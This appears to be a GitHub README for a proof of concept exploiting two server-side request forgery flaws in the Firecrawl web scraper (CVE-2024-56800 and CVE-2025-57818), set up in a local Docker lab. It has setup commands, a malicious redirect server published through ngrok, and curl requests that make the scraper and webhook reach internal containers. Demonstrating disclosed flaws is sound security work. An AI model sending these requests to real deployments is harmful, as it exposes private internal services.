# cve-2024-56800 POC

## Reference
https://nvd.nist.gov/vuln/detail/CVE-2024-56800

https://github.com/firecrawl/firecrawl/commit/4d1f92f4c8c36403022428285a03621fd90d62ec

https://github.com/firecrawl/firecrawl/security/advisories/GHSA-vjp8-2wgg-p734

## Vulnerability
Firecrawl is a web scraper that allows users to extract the content of a webpage. 
Versions prior to 1.1.1 contain a server-side request forgery (SSRF) vulnerability.
The scraper engine accepts websites redirect to any local IP addresses, causing the leak of resources in the private server.

it's under `apps/api/src/controllers/v1/scrape.ts`

the user input is not sanitized and is allowed to be private IP address. When it is using 127.0.0.1, it actually redirect to the firecrawl's local network, which leaking the internal server of the firecrawl server.


## How to use this POC
### 1. download this POC
```
git clone https://github.com/cyhe50/cve-2024-56800-poc
cd cve-2024-56800-poc 
```

### 2. start a self-hosted firecrawl server
```
cd scraper/firecrawl-1.0.0
docker-compose up -d
cd ../..
```

### 3. start a malicious server
```
cd malicious_server
docker build -t malicious_server .
docker run -p 8000:80 malicious_server
```

### 4. publish the malicious server
The reason is the firecrawl server blocks private url.
If you don't want to make the server public, I believe you can just comment out the validation in the firecrawl directly.

Here I just write down what I did.
ngrok:
```
ngrok http 8000
```

### 5. run scraper
curl: (remember to paste the correct url)
```
curl -X POST http://localhost:3002/v1/scrape \
      -H 'Content-Type: application/json' \
      -d '{
        "url": "https://xxxxx.ngrok-free.app",
        "formats": ["markdown", "html"]
      }'
```
<img width="1506" height="190" alt="Screenshot 2025-11-01 at 7 51 02 PM" src="https://github.com/user-attachments/assets/d06df9ed-3c40-4ed6-923a-d820be14a619" />


scraper.py
```
cd scraper
```

!! open Dockerfile and change the url to the one you just generated
```
docker build -t scraper .
docker run scraper
```

### expected output

## How the POC works

### Vulnerable Source Code

When starting the self-hosted firecrawl server, 5 services are enabled, one of them is `firecrawl-test-1` (see more details by `docker ps`).
Since all these 5 services are set to be in the same network, they can connect to each other by using the container name they want to connect to.

e.g. (connect to firecrawl-test-1)


running curl directly on local machine:
```
curl http://firecrawl-test-1:80
or
curl http://localhost:80
```
none of them should work because they are not in the same network as firecrawl-test-1


However, accessing in firecrawl-api-1: 
```
docker exec -it firecrawl-api-1 /bin/bash
curl http:firecrawl-test-1:80
or
curl http://localhost:80
```
this should output the correct data because they are in the same network.


In the malicious server, it redirects to http://firecrawl-test-1:80, which should only work for firecrawl network.
Therefore, the success of reaching firecrawl-test-1 server means the scraper redirect to its internal server successfully.
This shows how the SSRF works to expose resources in private server.


# CVE-2025-57818
This is also SSRF vuln.
This happens in crawl API where the parameter `webhook` is not sanitized, attackers can send POST request to a local network of firecrawl.

it's under `apps/api/src/services/webhook.ts`. The problem is that the input `webhookUrl` is not sanitized

The webhook will call a POST request to the specified url. Here we set it to 127.0.0.1 and it connected to the internal server successfully


```
curl -X POST http://localhost:3002/v1/crawl \
     -H 'Content-Type: application/json' \
     -d '{
       "url": "https://example.com",
       "webhook": "http://127.0.0.1:80"
     }'

```

The internal server received the POST request successfully
<img width="790" height="30" alt="Screenshot 2025-11-01 at 7 56 53 PM" src="https://github.com/user-attachments/assets/82ac197d-a424-48c8-b6d0-a37a8088aa96" />
